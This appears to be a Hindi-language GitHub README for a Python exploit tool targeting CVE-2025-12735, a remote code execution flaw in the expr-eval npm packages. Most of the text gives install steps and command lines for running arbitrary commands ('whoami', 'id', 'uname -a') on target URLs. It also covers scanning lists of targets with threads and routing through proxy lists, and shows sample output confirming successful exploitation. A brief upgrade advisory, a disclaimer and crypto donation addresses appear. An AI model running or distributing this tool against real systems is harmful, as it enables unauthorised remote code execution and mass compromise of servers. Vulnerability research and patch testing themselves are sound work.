
CVE-2025-12735 (expr-eval RCE vulnerability) का पता लगाने और परीक्षण करने के लिए सुरक्षा अनुसंधान उपकरण
expr-eval और expr-eval-fork npm पैकेजों में CVE-2025-12735 भेद्यता का पता लगाने और परीक्षण करने के लिए एक सुरक्षा अनुसंधान उपकरण।
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। इस उपकरण का उपयोग केवल उन सिस्टमों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
CVE-2025-12735 expr-eval और expr-eval-fork npm पैकेजों में एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है। यह भेद्यता हमलावरों को पार्सर द्वारा उपयोग किए जाने वाले context ऑब्जेक्ट के अंदर मनमाने फ़ंक्शन परिभाषित करने की अनुमति देती है, जिससे सिस्टम-स्तरीय कमांड निष्पादित करने वाले दुर्भावनापूर्ण कोड का इंजेक्शन संभव होता है।
CVSS स्कोर: 9.8 (गंभीर)
प्रभावित संस्करण: expr-eval-fork < 3.0.0
फिक्स्ड संस्करण: expr-eval-fork v3.0.0+
# रिपॉजिटरी को क्लोन करें
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce
# निर्भरताएँ स्थापित करें
pip install -r requirements.txt
# स्क्रिप्ट को निष्पादन योग्य बनाएं (वैकल्पिक)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py
# स्क्रिप्ट डाउनलोड करें
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py
# निर्भरताएँ स्थापित करें
pip install requests
# एकल लक्ष्य
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com
# कस्टम कमांड निष्पादित करें
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"
# फ़ाइल से अनेक लक्ष्य
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json
# तेज़ स्कैनिंग के लिए थ्रेडिंग के साथ
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5
# डीबगिंग के लिए वर्बोज़ आउटपुट
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v
# एकल प्रॉक्सी
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port
# फ़ाइल से अनेक प्रॉक्सी
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt
-u, --url लक्ष्य URL
-f, --file लक्ष्य URL वाली फ़ाइल (प्रति पंक्ति एक)
-c, --command निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id)
-t, --threads थ्रेड्स की संख्या (डिफ़ॉल्ट: 1)
-o, --output आउटपुट फ़ाइल (डिफ़ॉल्ट: uknf_expr_eval_results.json)
-v, --verbose वर्बोज़ लॉगिंग सक्षम करें
--proxy प्रॉक्सी URL (जैसे, http://127.0.0.1:8080)
--proxy-list प्रॉक्सी URL वाली फ़ाइल (प्रति पंक्ति एक)
स्क्रिप्ट विस्तृत परिणामों के साथ एक JSON फ़ाइल उत्पन्न करती है:
{
"target": "http://target.com",
"timestamp": "2025-11-20T15:35:32.638109",
"expr_eval_detected": true,
"vulnerable": true,
"endpoint_found": true,
"exploitation_successful": true,
"command_executed": "id",
"output": "uid=1000(user) gid=1000(user)...",
"vulnerable_endpoint": "/api/evaluate"
}
यदि आप expr-eval या expr-eval-fork का उपयोग कर रहे हैं:
तुरंत अपग्रेड करें:
npm install expr-eval-fork@latest
सुरक्षा पैच लागू करें:
इनपुट सत्यापन लागू करें:
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com
# लक्ष्य फ़ाइल बनाएं
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# स्कैन चलाएं
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"
# एकल प्रॉक्सी
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080
# फ़ाइल से अनेक प्रॉक्सी
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt
योगदान का स्वागत है! कृपया बेझिझक पुल रिक्वेस्ट सबमिट करें।
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)यदि आपको कोई समस्या आती है या सुझाव हैं, तो कृपया GitHub पर एक मुद्दा खोलें।
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
यदि आपको यह उपकरण उपयोगी लगे, तो कृपया इसे GitHub पर स्टार देने पर विचार करें!
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं हैं। उपयोगकर्ता यह सुनिश्चित करने के लिए जिम्मेदार हैं कि किसी भी सिस्टम का परीक्षण करने से पहले उनके पास उचित प्राधिकरण है।
यदि आपको यह उपकरण उपयोगी लगता है और आप परियोजना का समर्थन करना चाहते हैं:
बिटकॉइन (BTC):
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv
एथेरियम (ETH):
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7
आपके समर्थन के लिए धन्यवाद! 🙏